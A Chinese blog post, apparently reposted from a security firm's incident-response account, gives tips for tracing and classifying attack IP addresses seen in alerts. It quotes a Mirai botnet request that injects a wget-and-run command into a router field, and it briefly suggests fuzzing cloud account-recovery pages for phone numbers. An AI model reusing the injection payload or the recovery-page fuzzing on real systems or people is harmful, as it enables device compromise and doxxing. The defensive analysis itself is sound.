点击蓝字 关注咱们嗨,我是Phobos,我又回来了。近期各地攻防演练的频率越来越高,投入越来越大,非常多攻防时需要做的工作亦逐步纳入平常运营中,针对平常的攻击的IP溯源需要亦越来越频繁。然则平常攻击IP常常数量很大,经过各样安全设备导出的攻击IP更加是成百上千,那样怎样有效快速的对成百上千的攻击IP进行溯源定性呢?下面我总结了有些小技巧,便于大众参考。(在溯源过程中必定要灵活运用各样方式,切忌生搬硬套。)NO.0前期梳理
首要咱们拿到的原始数据是各式各样的,有的有告警信息,有的有攻击详情等等,这儿咱们只需要把IP复制到Excel或txt文档中,复制到哪里看个人习惯,我这儿随机找了有些ip为大众做演示。
拿到IP以后,咱们要做的便是排序和去重,由于IP来自于区别的设备非常多其实是重复的。7000多个ip排序去重后仅有613个。
对所有IP进行一个划分,以C段为划分,统计一下每一个C段有多少个IP,有的C段全部段都是同一行径特征,方便快速定性。
整理完IP后,能够经过X情报社区先批量查一波,判定IP是不是为恶意,亦能够剔除有些白名单,倘若无批量查找,能够跳过这一步,直接进入Tips。
NO.1搜索引擎大法以IP115.179.37.x为例,该段共有79个ip,如此海量IP搜索引擎通常会有有些记录。经过分析为百度爬虫。
NO.2UA大法经过UserAgent来获取定位信息,当然UA是能够伪造的,办法是灵活使用综合定位的,切勿生搬硬套。经过X情报社区获取该IP近期行径,获取到如下UserAgent信息。IP 116.179.37.X的UA[\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\"]}为百度蜘蛛。
IP 198.235.24.x的UA{\"User-Agent\":[\"Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers\\u0026#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com\"]}为paloaltonetworks扫描IP。
NO.3X标签大法经过X情报社区的标签,能够确定为搜索引擎爬虫。
NO.4IP信息搜集法经过IP信息网站来确定IP归属,能够得到hostname信息。hostname:"baiduspider-116-179-37-122.crawl.baidu.com"
查找该域名解析,确定baiduspider-116-179-37-122.crawl.baidu.com解析到116.179.37.122,基本确定为百度蜘蛛。
NO.5直接拜访法能够直接拜访关联ip,能够获取到有些信息,如IP164.92.192.165拜访后表示为leakix网络扫描探针。
NO.6攻击数据包分析大法经过IP画像可获取到历史数据包信息,并进行定位溯源。如IP111.53.145.x经过IP画像能够基本确定已感染僵尸网络,并对外进行自动化攻击,以金字塔形式进行传播。攻击中包括("XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://***/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0")其中busybox+wget+http://***/bin+-O+/tmp/gaf;sh+/tmp/gaf为mirai僵尸网络家族。
NO.7经过相关法进行定位分析例如某些IP云厂商能够经过IP找回获取到部分用户名信息。而后经过Fuzz获取到手机号等信息。
NO.8空间测绘大法经过空间测绘能够得到IP的历史开放端口及关联信息,亦能够获取到有价值的数据,例如能够经过443端口查看IP绑定的证书为哪个域名或企业。
NO.9样本定位大法经过IP到沙箱进行捞取该IP从在那些样本,这些样本的行径及家族是什么。如IP194.55.224.x相关的样本均为Mirai家族。
NO.10端口分析大法如经过对IP194.55.224.x的端口进行探测,发掘其21端口对外开放且能够匿名登陆,经过登陆发掘里面存在大量样本。
经过沙箱分析均为Mirai家族样本。
 fill=%23FFFFFF%3E%3Crect x=249 y=126 width=1 height=1%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E)
NO.11结语平常告警中,大部分IP能够分为几种类型,如:空间测绘、web站点探测、爬虫、蜘蛛、僵尸网络、漏洞扫描器,乃至还有的是CDN(非常多人用了CDN,而后未配置XFF关联策略,看到的攻击信息其实是来自于CDN回源),仅有一小部分才是针对性攻击。另一很多相同IP每日都能看到,如测绘、爬虫、僵尸网络,这种IP只需要溯源定位一次就能够了,不需要每次都深入分析。当然,以上只是技巧的一部分,溯源定性的技巧还有非常多非常多,然则不是所有的技巧都能写的,例如水印溯源大法,亦不是所有的IP都能溯源定性的,有的IP便是无任何公开信息。但愿以上技巧能够帮大众能够更高效的完成溯源任务。最后在提醒一句,在溯源过程中必定要灵活运用各样方式,多验证、证确认、多累积,切忌生搬硬套。- END -
微步应急响应团队为企业客户供给应急响应服务。当企业遭遇突发重大安全事件(APT攻击、勒索加密、数据窃取、漏洞攻击、主机被控、钓鱼事件等),微步可供给快速事件定位取证、隔离清除、溯源分析、安全加固等专业安全服务,帮忙企业信息系统在最短期内恢复正常工作,将事件影响降到最低。 倘若出现安全事件,可联系微步应急响应团队,联系方式:400-030-1051
转发,点赞,在看,安排一下? 1. 内容转载,请微X后台留言:转载+转载平台
2. 内容引用,请注明出处:以上内容引自公众号“微步在线应急响应团队”
| 
发表于 2024-8-25 22:06:56
